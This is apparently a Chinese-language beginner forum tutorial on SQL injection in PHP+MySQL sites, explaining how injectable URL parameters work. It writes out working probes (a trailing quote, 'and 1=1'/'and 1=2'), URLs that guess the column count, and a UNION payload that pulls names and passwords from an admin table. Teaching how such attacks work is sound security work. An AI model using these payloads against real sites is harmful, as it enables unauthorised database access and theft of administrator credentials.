普通注入
黑客攻防 零基础学习什么是注入 Whats SQL Injection
代码无罪 - 是你又是你还是你,从注入谈起
注入这个词自从数据库与动态脚本诞生至今日,一直是黑客们乐不此彼的谈论话题,现在Injection的思想已经不仅仅限于SQL当中,File Include,Command Execution等等,已经延伸到了WEB入侵的各种手段中。
我想要说的并不是如何去注入一个网站,而是注入的原理。
作者:Juliet @ Silic Group
我以php+MySQL为例来讲述注入是如何发生的
我们首先来看一个网址的构造:
xxoo.com / info.php ? articleid = 123
这里是域名 脚本文件名 变量名 变量的取值
脚本执行读取数据库操作的时候,会根据变量取值的不同,读取不同的数据,像这种体现在URL上面的取值方式叫做GET取值
当articleid变量取值为123时,我们假设一下在服务器中会有怎样的代码运行?
01.SELECT * /* Select函数读取信息 */
02.FROM infotable /* 从products数据表中 */
03.WHERE id='123';/* false condition满足条件时 */
复制代码/*XXXX*/是注释符号,当程序运行时,/**/和中间的部分计算机会自动忽略。
实际系统执行的代码是这样的:
01.select * from infotable where id = '123';
复制代码在这里,id的取值是通过url取值得来的“123”,那么如果我这样呢:
info.php?articleid=123'
后面多了一个单引号,那么比较一下系统原本执行的语句有什么变化:
01.select * from infotable where id = 123;
02.select * from infotable where id = 123';
复制代码最后多了一个引号,语法错误。
注:计算机编程得不到想要的结果,错误分两种,一种是语法错误,一种是逻辑错误。后面认真阅读你会慢慢明白区别开的
这也就是为什么判断是否为注入点的第一步要在网址后面加单引号的原因了(加单引号出错不能确定网址为注入点,只是判断的一个步骤而已
于是后面的1=1和1=2的目的也就清楚了
01.select * from infotable where id = 123;
02.select * from infotable where id = 123 and 1 = 1;//事实上1就是1,所以应该返回正常页面
03.select * from infotable where id = 123 and 1 = 2;//事实上,计算机中1永远也不等于2,发生逻辑错误,所以返回错误页面
复制代码手工注入通常会使用联合查询函数 union 下面讲一下union的用法
union注入的第一步通常是猜字段数
假设注入点是新闻页面,那么页面中执行的SQL语句就是:
01.select title,date,author,news,comm from news where id = 12;
复制代码当你进行union注入的时候,union前面的语句和union后面的语句,都是一个完整的SQL语句,是可以单独执行的语句
但是,必须保证前后的字段数相同,例如上面这个语句
01.select title,date,author,news,comm from news where id = 12;
02.select title,date,author,news,comm from news where id = 12 union select name,password,3,4,5 from admin;
03.//news是新闻表段,admin是管理员信息表段
04.//管理员信息表段明显没有union前面news表段里面包含的字段数多所以使用数字3到5替代,数字无固定格式,可以使1 2和3,也可以是111111和4435435或者干脆用null空来代替
复制代码所以,上面的注入语句在实际中就是这么构造:
01.info.php?id=12+union+select+name,password,3,4,5+from+admin
02.//SQL注入中,加号用来代表空格的意思,因为有些浏览器会自动将空格转换成%20,有碍观瞻
复制代码如果union前面是5个,而union后面不是5个,则会发生逻辑错误,显示错误页面。
由于程序员编写的程序我们并不知道他在数据库中设置了几个字段,所以通常我们都是先进行字段数的猜测,也就是:
01.info.php?id=12+union+select+1
02.info.php?id=12+union+select+1,2
03.info.php?id=12+union+select+1,2,3
04.info.php?id=12+union+select+1,2,3,4
05.info.php?id=12+union+select+1,2,3,4,5
06.//你也可以用order by来猜,用法可以自己搜一下
复制代码一直这样猜到正确页面出来,没有了逻辑错误,也就表示字段数一致了,然后。。。后面。。。
你可以阅读本系列帖子的后续帖子了